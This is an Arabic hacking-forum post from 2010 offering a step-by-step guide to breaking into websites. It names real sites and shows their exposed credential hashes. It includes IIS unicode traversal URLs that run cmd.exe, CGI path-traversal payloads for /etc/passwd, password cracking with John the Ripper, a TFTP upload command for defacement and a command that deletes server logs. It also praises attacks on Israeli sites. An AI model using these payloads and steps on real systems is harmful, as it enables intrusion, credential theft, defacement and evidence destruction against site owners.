التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-05-2010, 02:19 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية dz-sniper
 

 

 
إحصائية العضو






dz-sniper غير متواجد حالياً

إرسال رسالة عبر Skype إلى dz-sniper

 

 

إحصائية الترشيح

عدد النقاط : 10
dz-sniper is on a distinguished road

افتراضي جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصريا على منتدي العناكب


السلام عليكم ورحمة الله وبركاته

جميع طرق اختراق المواقع

مهم جدا جدا جدا
VIP
بسم الله نبدء:

(اختراق المواقع)

1- (اساسيات وتعاريف)
تلنت: (Telnet) - 1
و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى
Start ==> Run ==> telnet
و ستظهر شاشة التلنت.
------------------------------------------------------------------------
برامج السكان: (Scanner) - 2
و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة،
كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت
التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
Shadow Security Scanner و Stealth و Omran Fast
هذه البرامج، برنامج
Scanner
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ
IIS
على ثغرات السي جي اي فقط و منها برامج المسح
CGI
-----------------------------------------------------------------------
اكسبلويت: (Exploits) - 3
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL
، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
Buffer Over Flow Exploits
هناك أنواع من الإكسبلويت ، فمنها ال
CGI Exploits
CGI Bugs
Unicodes Exploits
Buffer Over Flow Exploits
PHP Exploits
DOS Exploits
والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول
Fire Wall
.وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c)
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler
و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------
الجدار الناري: (FireWall) - 4
هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة.
----------------------------------------------------------------------
هو ملف الباسورد المظلل: (Token) - 5
(Shadowed Passwd)
والذي يكون فيه الباسورد على شكل
*
او
x
البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب
Shadow file
تجده في
/etc/shadow
----------------------------------------------------------------------
Anonymouse) - 6
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه.
----------------------------------------------------------------------
Valnerableties) - 7
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟
Valnerable
أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus
أو بوق تراك او غيرها.
----------------------------------------------------------------------
: ملف الباسوورد(passwd file) - 8
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------
الجذر: (root) - 9
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
----------------------------------------------------------------------
السيرفر: (Server) - 10
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون

المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)
-----------------------------------------------------------------------
بوفر أوفر فلو: ( Buffer over Flow ) - 11
وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر .
-----------------------------------------------------------------------
كثير من الهكرز يحبون ان يطلقوا على كل من ال - 12
pc , servers , supercomputers
كلمه
BOX
-----------------------------------------------------------------------
13- النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز
تسطيع ان تطلق على الرئيس هناك كلمه
superuser
وهو يكون روت
وهو الادمين او المدير على النظام....
-----------------------------------------------------------------------
14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليو***س.
-----------------------------------------------------------------------
15- احنا اخترقنا موقع لازم نمسح خطواتنا علشان لايعرفنا صاحب الموقع ويئذينا كيف؟
/c+del+c:/winnt/system32/logfiles/*.log
نكتب هذا الامر بالدوس
او نروح السي وبعدين فايل ويندوز بعدين فايل
system32
بعدين
امسح ملف اسمة
*
وامتدادة
log
-----------------------------------------------------------------------
16- الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟
تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا
index
افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه
WS_FTP PRO
والبرنامج سهل اللي يبي شرح يقولي

------------------------------------------------------------------------------------------------
17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها )
هذي من أفضل برامج البحث عن الثغرات وان شاء الله تعجبكم انت بس ادخل وتلقى:
============================================
1-N-Stealth
تحميل
أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته
**************************************************
*************
2- Shadow Security Scanner
http://www.safety-lab.com/rus/download/download.htm
http://www.bluechillies.com/download.html?sid=7565
برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات
**************************************************
*************
3- Omran Scanner
تحميل
برنامج عربي من برمجة الأخ/عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل
Linux-Unix-NT
**************************************************
*************
4- CGI Scanner
تحميل
مختص في البحث عن ثغرات
cgi
وهو الأفضل في عمل ذلك
**************************************************
*************
5- UniScan
تحميل
كالسابق ولكن هذا البرنامج خاص بفحص ثغرات UNicode
**************************************************
*************
6- Retina Apache Chunked
تحميل
للبحث عن الأجهزة والمواقع التي تملك ثغرة
Apache
**************************************************
*************
7- SamiScan
http://www.angels-bytes.com/?show=t...tion=info&id=20
أداة رائعة وعربية يعرض نظام التشغيل والملقم والعنوان الحقيقي ويحتوي على أربع ملفات لايجادالثغرات
cfusion.txt, cgi.txt, cgi2.txt, NT.txt
**************************************************
*************
8- voideye
تحميل
نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على
sss
**************************************************
*************
الملقمات اشهرها اثنين: - 18
IIS:
من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها).
apache:
من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

-----------------------------------------------------------------
19- اول خطوة في الاختراق هي اخذ المعلومات:
يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.
طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع
http://www.netcraft.net/
ملاحظة: نكتب الموقع من غير
http://
ولا
/
اللي بالاخير
او نستخدم التلنت.
1 - مثال على ملقمات اي اي اس:
راح يطلع لنا التالي
The site http://www.***.org/ is running Microsoft-IIS/5.0 on Windows 2000
طيب الحين عرفنا معلومتين مهمتين
اول شيء انه شغال على الملقم
IIS5.0
ثاني شيء شغال على نظام ويندوز 2000
اول شيء نجرب ثغرات
IIS5.0
عليه
إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000
طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات
IIS
وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
طيب لنفرض انه ماطلع فيها ثغرات؟
نشوف محتويات الموقع نفسه
نشوف إن كان عنده سجل زوار او منتدى او ....
2 - مثال على ملقمات اباتشي:
ناخذ مثال موقع ارانك
http://www.arank.com/
لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:
The site http://www.arank.com/ is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج وهذه مليانة ثغرات
FrontPage/5.0.2.2510
3- النظام وهو
Linux
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملقم:
اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد
_vti_pvt
و
_private
هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي
service.pwd
و
users.pwd
و
authors.pwd
و
adminstators.pwd
ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
وهذا من موقع قودي
http://www.goody.com.sa/_vti_pvt/service.pwd
طيب الحين
goodyco
اليوزر والباسورد مشفر واللي هو
CalXS8USl4TGM
وشلون ينفك؟
ينفك ببرنامج اسمه
john the repaier
( شرح الاستخدام موجود في اخر موضوع في هذا المجلد)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
telnet
واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال
c
وهذه ماتشتغل إلا عاللينكس فقط.
----------------------------------------------------------------------
20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....)
http://www.ussrback.com/
الموقع هذا خطير جداً جداً تروح ل
EXPLOITS
اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من
c
و
perl
و يوني كود.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
http://neworder.box.sk
هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين
IIS او apache
او منتدى واصدارته او اي برنامج ويطلع لك ثغراته.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
أرشيف لثغرات
www.securiteam.com/exploits/archive.html
أرشيف لثغرات
www.ussrback.com
أرشيف لثغرات
www.secureroot.com
أرشيف لثغرات
www.rootshell.com
أرشيف لثغرات
www.ussrback.com
مواقع لثغرات
www.secureroot.com/category/exploits
---------------------------------------------------------------------
20- هناك انظمة وملقمات كثيرة منها:
Apache (الملقم)
IIS(الملقم)
SunOS(الملقم)
FreeBSD (My BaBe)(الملقم)
OpenBSD(الملقم)
NetBSD(الملقم)
AIX(الملقم)
IRIX(الملقم)
NetScape(الملقم)
Enterprise(الملقم)
Windows/NT/2000/xp (نظام التشغيل)
Linux(نظام الشتغيل )
-------------------------------------------------------------------
له ست مجلدات) 21- (اليونكس

خاص بالملفات الثنائيه يعني اللي تشغل النظام bin
ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd etc
ملفات الاجهزه dev
مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل lib
الملفات الموقته او غير الثابته tmp
اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام usr


--------------------------------------------------------------------
22- (اوامر الاف تي بي)
لكي تعرف ما يحتويه الهارد ديسك Pwd
لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Cd
لكي يتضح لك محتوى المجلد أو الهارد ديسك Ls
لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Get
العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Put
لقطع الإتصال مع الضحية Clos


يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname
----------------------------------------------------------------------------
23- بورتات برامج:-
7 echo
21 telnet
23 ftp
25 smtp
80 http
110 POP
----------------------------------------------------------------------------
c - 24
هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
Linux او Shell Account
----------------------------------------------------------------------------
25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
Error
وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق.
---------------------------------------------------------------------------
26 -(كيف تحصل على شيل اكاونت مجانا)

و تنقسم الشيل اكونتس الي نوعين:
1-restricted
2-non-restricted
و الفرق بينهما ان
restricted
مدفوع القيمه و يمكنك من تنفيذ اي
command
اما ال
non restricted
فهو مجاني
و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل
www.cyberarmy.com
او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها
بالتالي:
1-telnet
2-nslookup و الذي يعطيك معلومات عن المضيف
3-ftp
4-finger
4-trace route
5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
6-netstat
7-gcc و هذا كمبيلير للغه البرمجه c
8-gzip لفك ضغط الملفات
9-lynx متصفح للانترنت

------------------------------------------------------------------
تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27
.TFTP
-=-=-=-=-=-=-=-=-=-=-=-=-
قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
index.htm
على الـ
c:\
قم بتشغيل برنامج
TFTP
:ونفذ الامر في الفقرة التالية
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. htm
tftp.exe
وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i"
وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET
وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm
اسم الملف بجهازك
\inetpub\wwwroot\
اسم الدليل في السيرفر
index.htm
اسم الملف على السيرفر
-----------------------------------------------------------------
تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28
www.sitename.com:2082
أو
www.sitename.com/cpanel
هذا في حال كان الموقع يستخدم الـ
CPanel
وهو البرنامج الأكثر شيوعاً ..
ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
وتصير في الداخل.
----------------------------------------------------------------
29- اماكن تواجد ملف باسوورد المواقع:
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd
----------------------------------------------------------------
30- كيف اتاكد انا الثغر شغالة ولا لا؟
- جرب اللثغرة بواسطة الـ
URL او الـ URI .
----------------------------------------------------------------
31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟
(IIS4.0 on WinNT)
http://www.microsoft.com/ntserver/nt...62/default.asp
(IIS5.0 on Win2000)
www.microsoft.com/windows200...862/default.asp
----------------------------------------------------------------
32 - ما الفرق بين ملف الباسورد المشفر
encryption
والمضلل
shadowed?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملف المضلل
shadow file
يكون مكان كلمة المرور رمز مثل
*
أو
x
أو
#
أو
!
وهذا مثال لها
root:0Super-User:/:/sbin/sh
لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw
-------------------------------------------------------------------
وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير.
-------------------------------------------------------------------
34 -اذا كان ملف
passwd
مضلل ماذا تفعل؟
الان جميع ملفات
passwd
تكون مضللة ولكن توجد طريقة لفكها
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو
shadow
ماهي اماكن تواجد ملف
shadow
في الأنظمة؟
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي:
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
token
تعني الرمز الذي يوجد في الملف
passwd
وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في
/etc/security/passwd
، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه).
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف
shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج
**********************************************
http://packetstorm.securify.com/Crackers/john-16w.zip
http://www.geocities.com/wildxone2002/john16.zip
http://www.diabolo666-security.com/...er/john-16d.zip
**********************************************
انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو
unshadow passwd.txt shadow.txt
اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة
x
التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x
تكون في ملف الباس
-------------------------------------------------------------------
35- فك تشفير ملف
shadow
asswd بعد دمجه مع ملف
x وهو طريقة فك تشفير ملف
passwd
الدليل الكامل لكسر كلمات السر
برنامج
John the Ripper
لكسر كلمات السر
-----------------------------------------------------------------
برنامج - 36
(John the Ripper)
احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة
(nix*)
وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف
(PASSWD)
بان يكون مضلل وعلى المخترق الحصول على ملف
(SHADOW)
لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
----------------------------------------------------------------
37 - كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب
ftp
يمكنك استخدام احد برامج ال
ftp
منها
ws_ftp
او
CuteFTP 4.2.5 Build 10.4.1
وعنوانه هنا للتحميل
---------------------------------------------------------------------
38 - طريقة تنفيذ الثغرات:

مكان تنفيذ الثغرات
http://www.xxxxx.com/scripts/..&Aa....exe?/c+dir+c:\
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
Dir
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
--------------------------------------------------------------------
2-(شرح الثغرات واستغلالها)
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:

ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل
www.****.com/_vti_pvt
يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف

ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع
http://www.netcraft.net
تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق
http://www.heyerlist.org/garderobe/_vti_pvt
-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:


ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
هنـــــــــا
--------------------------------------------------------------------
3 - شرح ثغرة سي جي اي وكيفية استغلالها:

CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليو***ود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
www.somesite.com
فتكتب الثغرة هكذا في المتفح
www.somesite.com/cgi-bin/passwd.txt
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd

اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
http://www.target.com/cgi-bin/apexe...te=../../../../
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
http://www.target.com/cgi-bin/hsx.c..../etc/passwd%00
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:

IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليو***ودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu.../cmd.exe?/c+dir +c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
*************************************************
طريقه استغلال ثغرات اي اي اس بكذى طريقه

يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال
cmd.exe
لتنفيذ اوامرنا
مثال للثغره و تطبيق الاوامر:
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
امر انشاء دليل جديد
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
امر الغاء دليل
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
الامر المستخدم للنسخ
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
الامر المستخدم للحذف
